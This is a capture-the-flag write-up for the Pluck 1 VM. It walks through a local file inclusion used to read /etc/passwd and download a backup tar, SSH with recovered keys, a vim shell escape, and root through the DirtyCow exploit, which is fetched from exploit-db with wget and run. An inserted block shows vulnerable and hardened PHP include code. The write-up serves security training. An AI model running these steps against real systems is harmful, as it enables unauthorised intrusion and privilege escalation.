Pluck1 CTF VM Walkthrough

Today I’m trying to own the Pluck 1 CTF VM.

I started by looking at what was open:

root@pss:~/ctf/pluck# nmap -sV 192.168.1.115 -p 1-65535

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-23 17:52 ART
Nmap scan report for 192.168.1.115
Host is up (0.074s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
5355/tcp open  unknown
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.50 seconds

As in most CTFs, port 80 is the first place to look for a first clue.

http landing

The source code didn’t reveal anything interesting, but the URLs did:

Let me try something. If the URL http://192.168.1.115/index.php?page=contact.php uses that page param to load a file called contact.php, I should also be able to hit http://192.168.1.115/contact.php and get the same page. Let’s take a look…

OK!! It worked! So I only lost the CSS style that was inherited from the index.php page.

I also tested that it includes not only PHP files but any file on the server, like http://192.168.1.115/index.php?page=js/jquery.min.js, which I knew was there from looking at the landing page source.

JQuery fetched

Let’s try to get to the / directory. I’m not sure how many folders we will need to go back, but we know that from there we can get access to the server config file, normally at /etc/apache2/apache2.conf.

Apache2conf

Looking at the page source, it’s more human friendly.

Apache2conf
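The root cause of everything above is an include() driven straight by the page parameter. As an added example (not the VM’s own index.php, whose source is not on this page), here is that pattern next to an allow-listed replacement; the pages/ directory and file names are assumed:

```php
<?php
// Added example, not the Pluck VM's code. Shows why index.php?page=... could
// read jquery.min.js, apache2.conf and /etc/passwd, and one way to close it.

// VULNERABLE: the client-supplied value is the include path, so any file the
// web server user can read (with ../ to walk up) is included and served.
function vulnerable_include(string $page): void
{
    include($page);
}

// HARDENED: the request selects a key, never a path. Unknown keys fall back
// to the default page, and the resolved file must still sit inside pages/.
function page_map(): array
{
    return [
        'home'    => 'home.php',     // assumed file names
        'about'   => 'about.php',
        'contact' => 'contact.php',
    ];
}

function resolve_page(?string $page): string
{
    $map  = page_map();
    $key  = ($page !== null && isset($map[$page])) ? $page : 'home';
    $root = realpath(__DIR__ . '/pages');          // assumed layout
    $path = realpath(__DIR__ . '/pages/' . $map[$key]);

    // realpath() collapses ../ and symlinks; refuse anything outside $root
    // even though the map already makes that impossible (defence in depth).
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($root === false || $path === false
        || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        http_response_code(404);
        exit('Not found');
    }
    return $path;
}

include(resolve_page($_GET['page'] ?? null));
```

With the map in place the only reachable files are the three listed, so a request like page=../../../etc/passwd silently renders the home page instead of the file.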

Eeeeasy, let’s get shadow! There was no shadow nor shadow-, but passwd was there:

passwd file

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

Ok, so we have root and several usernames to try:

root:x:0:0:root:/root:/bin/bash
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu

The problem is that we have no passwords for them.

There is another user that caught my attention:

backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

Let’s try to fetch that backup script file.

Script

The backup script was pointing to a tar file, so let’s download it!

root@pss:~/ctf/pluck# wget http://192.168.1.115/index.php?page=../../../backups/backup.tar
--2017-03-23 18:55:00--  http://192.168.1.115/index.php?page=../../../backups/backup.tar
Connecting to 192.168.1.115:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘index.php?page=..%2F..%2F..%2Fbackups%2Fbackup.tar.1’

e=..%2F..%2F..%2Fbackups%2     [                                <=>    ] 896.15M  --.-KB/s               ^C

root@pss:~/ctf/pluck# mv index.php\?page\=..%2F..%2F..%2Fbackups%2Fbackup.tar.1 backup.tar.1
root@pss:~/ctf/pluck# vim backup.tar.1
root@pss:~/ctf/pluck# mv backup.tar.1 backup.tar
root@pss:~/ctf/pluck# tar -xvf backup.tar 
home/
home/bob/
home/bob/.bashrc
home/bob/.sudo_as_admin_successful
home/bob/.profile
home/bob/.bash_logout
home/paul/
home/paul/keys/
home/paul/keys/id_key3.pub
home/paul/keys/id_key2.pub
home/paul/keys/id_key2
home/paul/keys/id_key4.pub
home/paul/keys/id_key5.pub
home/paul/keys/id_key6
home/paul/keys/id_key1
home/paul/keys/id_key5
home/paul/keys/id_key1.pub
home/paul/keys/id_key6.pub
home/paul/keys/id_key4
home/paul/keys/id_key3
home/paul/.bashrc
home/paul/.profile
home/paul/.bash_logout
home/peter/
home/peter/.bashrc
home/peter/.profile
home/peter/.bash_logout
var/www/html/
var/www/html/fonts/
var/www/html/fonts/glyphicons-halflings-regular.svg
var/www/html/fonts/glyphicons-halflings-regular.woff2
var/www/html/fonts/glyphicons-halflings-regular.ttf
var/www/html/fonts/glyphicons-halflings-regular.woff
var/www/html/fonts/glyphicons-halflings-regular.eot
var/www/html/about.php
var/www/html/index.php

Looking at the tar contents closely, only paul seems to have a way in, through some of his keys. So let’s try them.

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key1 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key2 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key3 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key4 paul@192.168.1.115

The fourth was the one! It dropped me into this pdmenu binary, which had an option to edit a file that opened vim.

edit file

Then, from vim, you could run:

:set shell=/bin/bash
:shell

This gave me a shell:

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key4 paul@192.168.1.115
Last login: Fri Mar 24 00:36:38 2017 from 192.168.1.38

paul@pluck:~$ whoami
paul
paul@pluck:~$ 

I did a search looking for files with the SUID bit set:

paul@pluck:~$ find / -perm -4000 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

I searched for exploits and found the best one to be DirtyCow, which exploits a Linux kernel vulnerability. So I checked if I had gcc installed:

paul@pluck:~$ gcc --version
gcc (Ubuntu 6.2.0-5ubuntu12) 6.2.0 20161005
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Then I got the DirtyCow exploit:

paul@pluck:~$ wget https://exploit-db.com/download/40616
--2017-03-24 01:41:18--  https://exploit-db.com/download/40616
Resolving exploit-db.com (exploit-db.com)... 192.124.249.8
Connecting to exploit-db.com (exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4965 (4.8K) [application/txt]
Saving to: ‘40616’

40616               100%[================>]   4.85K  --.-KB/s    in 0s      

2017-03-24 01:41:20 (612 MB/s) - ‘40616’ saved [4965/4965]

paul@pluck:~$ mv 40616 cow.c
paul@pluck:~$ vim cow.c 
paul@pluck:~$ gcc cow.c -o cow -pthread
cow.c: In function ‘procselfmemThread’:
cow.c:99:17: warning: passing argument 2 of ‘lseek’ makes integer from pointer without a cast [-Wint-conversion]
         lseek(f,map,SEEK_SET);
                 ^~~
In file included from cow.c:28:0:
/usr/include/unistd.h:337:16: note: expected ‘__off_t {aka long int}’ but argument is of type ‘void *’
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
                ^~~~~
cow.c: In function ‘main’:
cow.c:136:5: warning: implicit declaration of function ‘asprintf’ [-Wimplicit-function-declaration]
     asprintf(&backup, "cp %s /tmp/bak", suid_binary);
     ^~~~~~~~
cow.c:140:5: warning: implicit declaration of function ‘fstat’ [-Wimplicit-function-declaration]
     fstat(f,&st);
     ^~~~~
cow.c:142:30: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘__off_t {aka long int}’ [-Wformat=]
     printf("Size of binary: %d\n", st.st_size);
            
                              ^

One of the big problems I had was that when running the exploit, I had only 1~2 seconds to operate before the CTF VM froze completely.

While researching, I found a comment about running echo 0 > /proc/sys/vm/dirty_writeback_centisecs to make the DirtyCow exploit work properly.

So I copied the command, and as soon as I got a shell, I pasted and ran it. Then it was just a matter of going to the root folder to find the flag.

paul@pluck:~$ ./cow 
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 54256
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
root@pluck:/home/paul# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@pluck:/home/paul# cd /root
root@pluck:/root# ls
flag.txt
root@pluck:/root# cat flag.txt 

Congratulations you found the flag

---------------------------------------

######   ((((((((((((((((((((((((((((((
#########   (((((((((((((((((((((((((((
,,##########   ((((((((((((((((((((((((
@@,,,##########   (((((((((((((((((((((
@@@@@,,,##########                     
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########                    
@@@,,,##########   &&&&&&&&&&&&&&&&&&&&
,,,##########   &&&&&&&&&&&&&&&&&&&&&&&
##########   &&&&&&&&&&&&&&&&&&&&&&&&&&
#######   &&&&&&&&&&&&&&&&&&&&&&&&&&&&&

root@pluck:/root# 


That’s all folks!